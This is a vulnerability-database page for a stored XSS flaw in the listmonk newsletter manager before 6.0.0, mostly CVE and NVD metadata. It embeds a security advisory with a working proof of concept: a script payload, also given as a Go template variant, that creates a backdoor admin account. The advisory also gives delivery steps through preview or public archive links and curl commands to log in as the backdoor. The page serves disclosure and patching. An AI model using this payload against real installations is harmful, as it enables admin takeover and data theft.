CVE-2026-21483 (GCVE-0-2026-21483)
Vulnerability from cvelistv5 – Published: 2026-01-02 20:57 – Updated: 2026-01-02 21:18
VLAI?
Title
listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover
Summary
listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue.
Severity ?
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-21483",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-02T21:18:17.532399Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-02T21:18:57.834Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "listmonk",
"vendor": "knadh",
"versions": [
{
"status": "affected",
"version": "\u003c 6.0.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-02T20:57:29.332Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565"
}
],
"source": {
"advisory": "GHSA-jmr4-p576-v565",
"discovery": "UNKNOWN"
},
"title": "listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-21483",
"datePublished": "2026-01-02T20:57:29.332Z",
"dateReserved": "2025-12-29T14:34:16.005Z",
"dateUpdated": "2026-01-02T21:18:57.834Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-21483\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-02T21:16:03.217\",\"lastModified\":\"2026-01-08T18:09:49.800\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-21483\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-02T21:18:17.532399Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-02T21:18:46.885Z\"}}], \"cna\": {\"title\": \"listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover\", \"source\": {\"advisory\": \"GHSA-jmr4-p576-v565\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"knadh\", \"product\": \"listmonk\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 6.0.0\"}]}], \"references\": [{\"url\": \"https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565\", \"name\": \"https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-02T20:57:29.332Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-21483\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-02T21:18:57.834Z\", \"dateReserved\": \"2025-12-29T14:34:16.005Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-02T20:57:29.332Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-JMR4-P576-V565
Vulnerability from github – Published: 2026-01-02 23:04 – Updated: 2026-01-02 23:04
VLAI?
Summary
listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover
Details
Security Advisory: Stored XSS Leading to Admin Account Takeover
Affected Versions: ≤ 5.1.0
Vulnerability Type: CWE-79: Stored Cross-Site Scripting
Summary
A lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts.
The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required.
Required Attacker Permissions
campaigns:manage - Create/edit campaigns
campaigns:get - View campaigns
lists:get_all - Access lists
templates:get - Access templates
Note: These are common permissions for content managers who are not full admins.
Attack Vectors
Vector 1: Raw HTML (Direct Script Tag)
<script>
fetch('/api/users', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
credentials: 'include',
body: '{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'
});
</script>
Vector 2: Go Template Safe Function
{{ `<script>fetch('/api/users',{method:'POST',headers:{'Content-Type':'application/json'},credentials:'include',body:'{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'});</script>` | Safe }}
Attack Scenarios
Scenario 1: Campaign Preview Attack
- Attacker creates campaign with XSS payload
- Request is made to super admin: "Please review my newsletter draft"
- Super admin opens campaign and clicks Preview
- XSS executes → Backdoor admin account created
- Attacker logs in with
backdoor/Hacked123
Scenario 2: Archive Link Attack (No Click Required)
- Attacker creates campaign with XSS payload
- Attacker enables Archive for the campaign
- Attacker shares archive link:
http://localhost:9000/archive/{uuid} - Super admin visits the link (no preview click needed!)
- XSS executes automatically → Account takeover
Proof of Concept
Step 1: Create Malicious Campaign
As lower-privileged user, create campaign with body:
<script>
fetch('/api/users', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
credentials: 'include',
body: JSON.stringify({
username: 'backdoor',
email: 'backdoor@evil.com',
name: 'Backdoor Admin',
password: 'Hacked123',
type: 'user',
status: 'enabled',
userRoleId: 1,
user_role_id: 1
})
});
</script>
Step 2: Enable Archive (Optional - for link-based attack)
- Edit campaign settings
- Enable "Archive"
- Copy archive URL:
http://localhost:9000/archive/{campaign-uuid}
Step 3: Trigger Execution
Option A - Preview: - Send campaign to super admin for "review" - Super admin previews → XSS fires
Option B - Archive Link: - Share archive URL with super admin - Super admin visits link → XSS fires automatically
Step 4: Verify Takeover
# Login as backdoor admin
curl -X POST "http://localhost:9000/admin/login" \
-d "username=backdoor&password=Hacked123" \
-c cookies.txt -L
# Verify super admin access
curl -b cookies.txt "http://localhost:9000/api/users"
Evidence Screenshots
[Screenshot 1: Lower-privileged user creating malicious campaign]
[Screenshot 2: Super admin previewing campaign]
[Screenshot 3: Backdoor user successfully created]
Impact
| Action | Possible via XSS |
|---|---|
| Create backdoor admin | ✅ Yes |
| Export all subscribers | ✅ Yes |
| Modify SMTP settings | ✅ Yes |
| Delete all campaigns | ✅ Yes |
| Access API keys/secrets | ✅ Yes |
Affected Components
| Component | XSS Works? | Method |
|---|---|---|
| Campaign body (Raw HTML) | ✅ Yes | Direct <script> tag |
| Campaign body (Template) | ✅ Yes | {{ \ ` | Safe }}` |
| Template body | ✅ Yes | Both methods |
| Campaign archive | ✅ Yes | Automatic execution on visit |
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/knadh/listmonk"
},
"ranges": [
{
"events": [
{
"introduced": "1.1.1"
},
{
"fixed": "6.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/knadh/listmonk"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.1-0.20251231125615-74dc5a01cfbb"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-21483"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-02T23:04:15Z",
"nvd_published_at": "2026-01-02T21:16:03Z",
"severity": "MODERATE"
},
"details": "## Security Advisory: Stored XSS Leading to Admin Account Takeover\n\n**Affected Versions:** \u2264 5.1.0 \n**Vulnerability Type:** CWE-79: Stored Cross-Site Scripting \n\n---\n\n## Summary\n\nA lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts.\n\nThe attack can be weaponized via the **public archive feature**, where victims simply need to visit a link - no preview click required.\n\n---\n\n## Required Attacker Permissions\n\n```\ncampaigns:manage - Create/edit campaigns\ncampaigns:get - View campaigns \nlists:get_all - Access lists\ntemplates:get - Access templates\n```\n\n**Note:** These are common permissions for content managers who are not full admins.\n\n---\n\n## Attack Vectors\n\n### Vector 1: Raw HTML (Direct Script Tag)\n\n```html\n\u003cscript\u003e\nfetch(\u0027/api/users\u0027, {\n method: \u0027POST\u0027,\n headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n credentials: \u0027include\u0027,\n body: \u0027{\"username\":\"backdoor\",\"email\":\"backdoor@evil.com\",\"name\":\"Backdoor\",\"password\":\"Hacked123\",\"type\":\"user\",\"status\":\"enabled\",\"userRoleId\":1,\"user_role_id\":1}\u0027\n});\n\u003c/script\u003e\n```\n\n### Vector 2: Go Template `Safe` Function\n\n```\n{{ `\u003cscript\u003efetch(\u0027/api/users\u0027,{method:\u0027POST\u0027,headers:{\u0027Content-Type\u0027:\u0027application/json\u0027},credentials:\u0027include\u0027,body:\u0027{\"username\":\"backdoor\",\"email\":\"backdoor@evil.com\",\"name\":\"Backdoor\",\"password\":\"Hacked123\",\"type\":\"user\",\"status\":\"enabled\",\"userRoleId\":1,\"user_role_id\":1}\u0027});\u003c/script\u003e` | Safe }}\n```\n\n---\n\n## Attack Scenarios\n\n### Scenario 1: Campaign Preview Attack\n\n1. Attacker creates campaign with XSS payload\n2. Request is made to super admin: *\"Please review my newsletter draft\"*\n3. Super admin opens campaign and clicks **Preview**\n4. XSS executes \u2192 Backdoor admin account created\n5. Attacker logs in with `backdoor` / `Hacked123`\n\n### Scenario 2: Archive Link Attack (No Click Required)\n\n1. Attacker creates campaign with XSS payload\n2. Attacker enables **Archive** for the campaign\n3. Attacker shares archive link: `http://localhost:9000/archive/{uuid}`\n4. Super admin visits the link (no preview click needed!)\n5. XSS executes automatically \u2192 Account takeover\n\n---\n\n## Proof of Concept\n\n### Step 1: Create Malicious Campaign\n\nAs lower-privileged user, create campaign with body:\n```html\n\u003cscript\u003e\nfetch(\u0027/api/users\u0027, {\n method: \u0027POST\u0027,\n headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n credentials: \u0027include\u0027,\n body: JSON.stringify({\n username: \u0027backdoor\u0027,\n email: \u0027backdoor@evil.com\u0027, \n name: \u0027Backdoor Admin\u0027,\n password: \u0027Hacked123\u0027,\n type: \u0027user\u0027,\n status: \u0027enabled\u0027,\n userRoleId: 1,\n user_role_id: 1\n })\n});\n\u003c/script\u003e\n```\n\n### Step 2: Enable Archive (Optional - for link-based attack)\n\n1. Edit campaign settings\n2. Enable \"Archive\"\n3. Copy archive URL: `http://localhost:9000/archive/{campaign-uuid}`\n\n### Step 3: Trigger Execution\n\n**Option A - Preview:**\n- Send campaign to super admin for \"review\"\n- Super admin previews \u2192 XSS fires\n\n**Option B - Archive Link:**\n- Share archive URL with super admin\n- Super admin visits link \u2192 XSS fires automatically\n\n### Step 4: Verify Takeover\n\n```bash\n# Login as backdoor admin\ncurl -X POST \"http://localhost:9000/admin/login\" \\\n -d \"username=backdoor\u0026password=Hacked123\" \\\n -c cookies.txt -L\n\n# Verify super admin access\ncurl -b cookies.txt \"http://localhost:9000/api/users\"\n```\n\n---\n\n## Evidence Screenshots\n\n\u003e **[Screenshot 1: Lower-privileged user creating malicious campaign]**\n\u003cimg width=\"1892\" height=\"781\" alt=\"Screenshot 2025-12-27 170259\" src=\"https://github.com/user-attachments/assets/b9af26bf-0c5b-4667-ba9a-eea774156d0b\" /\u003e\n\n\u003e **[Screenshot 2: Super admin previewing campaign]**\n\u003cimg width=\"1686\" height=\"709\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4ca3d5ff-0cd9-4f22-bca0-e26e13c6b1c7\" /\u003e\n\n\u003e **[Screenshot 3: Backdoor user successfully created]**\n\u003cimg width=\"1370\" height=\"469\" alt=\"Screenshot 2025-12-27 170413\" src=\"https://github.com/user-attachments/assets/18135128-f5af-4023-9aa7-8662a1405ed2\" /\u003e\n\n---\n\n## Impact\n\n| Action | Possible via XSS |\n|--------|-----------------|\n| Create backdoor admin | \u2705 Yes |\n| Export all subscribers | \u2705 Yes |\n| Modify SMTP settings | \u2705 Yes |\n| Delete all campaigns | \u2705 Yes |\n| Access API keys/secrets | \u2705 Yes |\n\n---\n\n## Affected Components\n\n| Component | XSS Works? | Method |\n|-----------|-----------|--------|\n| Campaign body (Raw HTML) | \u2705 Yes | Direct `\u003cscript\u003e` tag |\n| Campaign body (Template) | \u2705 Yes | `{{ \\` \\` \\| Safe }}` |\n| Template body | \u2705 Yes | Both methods |\n| Campaign archive | \u2705 Yes | Automatic execution on visit |\n\n---",
"id": "GHSA-jmr4-p576-v565",
"modified": "2026-01-02T23:04:15Z",
"published": "2026-01-02T23:04:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21483"
},
{
"type": "WEB",
"url": "https://github.com/knadh/listmonk/commit/74dc5a01cfbb12cf218cb33ddad8410c53e2e915"
},
{
"type": "PACKAGE",
"url": "https://github.com/knadh/listmonk"
},
{
"type": "WEB",
"url": "https://github.com/knadh/listmonk/releases/tag/v6.0.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover"
}
FKIE_CVE-2026-21483
Vulnerability from fkie_nvd - Published: 2026-01-02 21:16 - Updated: 2026-01-08 18:09
Severity ?
Summary
listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue."
}
],
"id": "CVE-2026-21483",
"lastModified": "2026-01-08T18:09:49.800",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-01-02T21:16:03.217",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…